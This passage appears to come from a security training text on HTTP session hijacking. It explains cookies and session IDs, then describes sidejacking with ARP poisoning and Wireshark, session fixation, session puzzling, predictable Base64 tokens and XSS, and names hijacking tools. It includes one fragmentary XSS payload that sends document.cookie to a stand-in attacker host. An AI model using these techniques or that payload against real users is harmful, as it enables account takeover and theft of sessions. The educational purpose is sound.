Another form of session hijacking is to steal the session credential from a user's browser and then use it to impersonate the user on a website. HTTP has no mechanism at the protocol level for tracking the state of a particular browser request. From the server's perspective, every request it receives from the client is new. If authentication is required, the user must either re-enter credentials for every new request, or some other mechanism must exist to tie all requests into a single continuous session. The most common mechanism for doing this is a cookie. A cookie is a text file that the server gives to the client browser. It contains the session ID (SID) for that particular web session, and is used as an authentication token. The browser keeps presenting the cookie every time a request is made. In this way, the user does not need to keep re-entering credentials at the website. If you can steal the victim's session ID, you can put it in your own cookie and use it.
The following table summarizes common ways to hijack a browser session.
Sniffing the cookie (sidejacking)
The attacker uses ARP poisoning and Wireshark to sniff the user's cleartext HTTP session and steal the cookie.
If the website developer only requires HTTPS for the login, or if the HTTPS session uses HTTP to request an image or other file from another server in the same domain, the cookie will be attached and in plaintext and can be stolen. Search the captured packets for "sess" or "PHPsess".
The cookie is supposed to be generated after authentication, but in some cases, through bad coding practice, it might be generated first upon connecting to the site. A variant of this attack is for the attacker to open a browser to a popular website at a public Internet cafe, library, or some other place where computers are shared. The attacker notes the cookie, leaves the login page open, and waits for a user to sit down and log in. At this point, the attacker knows the cookie for that user and can supply it to the same site.
Session variable overloading (session puzzling)
The attacker bypasses authentication by accessing pages in an unexpected order. The application wrongly sets the session attribute to the victim user account and fetches the user's profile page for the attacker.
No session logout or expiration time
The server does not properly destroy the session after the user leaves the site, or does not log out the user after inactivity timeout.
Predictable session token
The user name firstname.lastname@example.org translates to Base 64 as bW9vQGV4YW1wbGUuY29t. The website might set the cookie as such: Set-Cookie: sessionid=bW9vQGV4YW1wbGUuY29t=
Cross-site scripting (XSS)
Here's an example of the malicious link for an XSS attack:
“http://www.attackersite.com/cookie_grab.php?c=” + document.cookie</script>
HTTP Session Hijacking Tools
Common tools for HTTP session hijacking include:
- Hamster, Ferret
- ARP poisoner such as Ettercap or Cain & Abel, plus a sniffer like Wireshark
Note: Do not confuse a browser session ID (SID) with a Microsoft Security ID (SID). The Microsoft SID is a 128-bit permanent identifier for a user account in Windows.